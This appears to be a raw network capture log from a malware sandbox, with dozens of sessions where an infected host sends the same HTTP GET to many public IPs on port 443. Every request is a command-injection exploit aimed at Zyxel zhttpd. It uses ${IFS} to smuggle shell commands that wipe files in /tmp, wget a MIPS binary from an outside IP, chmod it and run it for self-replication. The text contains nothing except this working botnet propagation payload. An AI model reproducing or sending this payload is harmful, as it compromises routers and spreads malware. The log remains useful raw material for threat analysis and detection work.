                                                        Jan 28, 2024 10:12:41.175796032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1450192.168.2.145484053.102.89.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.175837994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1451192.168.2.144335267.159.240.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.175889015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1452192.168.2.145173098.212.57.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.175915003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1453192.168.2.1443782118.81.44.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.175952911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1454192.168.2.144997290.169.53.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.176007986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1455192.168.2.14569089.234.243.132443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.176039934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1456192.168.2.1442490169.171.175.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.176062107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1457192.168.2.1444750115.112.231.91443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.176093102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1458192.168.2.144890651.143.179.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.176147938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1459192.168.2.1446004103.218.207.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.176194906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1460192.168.2.1439474178.4.36.0443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.176228046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1461192.168.2.1441560115.250.220.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.176254034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1462192.168.2.145492863.18.133.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.176304102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1463192.168.2.1452816142.4.79.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.176357985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1464192.168.2.146094243.198.100.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.176382065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1465192.168.2.1438630207.181.78.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.176424026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1466192.168.2.1451118189.99.31.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.176455975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1467192.168.2.1457632110.51.230.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.176480055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1468192.168.2.14381242.130.30.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.176532030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1469192.168.2.1455480161.0.213.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.176551104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1470192.168.2.145256068.149.58.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.176625013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1471192.168.2.14528929.100.210.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.176646948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1472192.168.2.1442066202.117.84.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.176712990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1473192.168.2.1456960133.45.43.120443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.176743031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1474192.168.2.143976469.40.72.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.176779032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1475192.168.2.1452502184.249.173.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.176819086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1476192.168.2.145628419.71.125.124443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.176860094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1477192.168.2.1437110117.111.62.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.176919937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1478192.168.2.1456594201.176.231.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.176970005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1479192.168.2.1440998149.219.224.158443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.177000999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1480192.168.2.1460964185.61.138.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.177052021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1481192.168.2.1458366116.44.171.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.177104950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1482192.168.2.1458930128.97.129.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.177134037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1483192.168.2.144350864.238.232.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.177169085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1484192.168.2.1441898113.31.108.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.177191973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1485192.168.2.1455328145.205.209.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.177247047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1486192.168.2.1444048218.163.66.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.177287102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1487192.168.2.143629898.163.187.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.177319050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1488192.168.2.143944677.67.125.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.177346945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1489192.168.2.1437418145.166.94.23443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.177403927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1490192.168.2.1456134140.125.28.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.177438021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1491192.168.2.1452338107.226.47.115443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.177468061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1492192.168.2.144664080.162.214.197443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.177501917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1493192.168.2.1442312158.189.89.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.177536011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1494192.168.2.1442304159.185.148.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.177581072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1495192.168.2.143597038.62.235.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.177618027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1496192.168.2.1457940106.125.212.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.177670002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1497192.168.2.144321863.178.105.153443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.177711010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1498192.168.2.1439414210.191.8.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.177743912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1499192.168.2.1436288166.179.239.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.177767038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1500192.168.2.1451710134.160.118.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.177791119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1501192.168.2.1433204216.80.40.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.177814960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1502192.168.2.1450900140.193.212.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.177849054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1503192.168.2.143304649.27.189.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.177911043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1504192.168.2.143939645.209.37.33443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.177949905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1505192.168.2.1434146212.77.147.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.177982092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1506192.168.2.145604261.74.223.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.178031921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1507192.168.2.145406296.145.222.76443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.178059101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1508192.168.2.144204453.58.50.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.178102016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1509192.168.2.143950641.89.132.59443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.178139925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1510192.168.2.146012266.248.31.126443
                                                        TimestampBytes transferredDirectionData
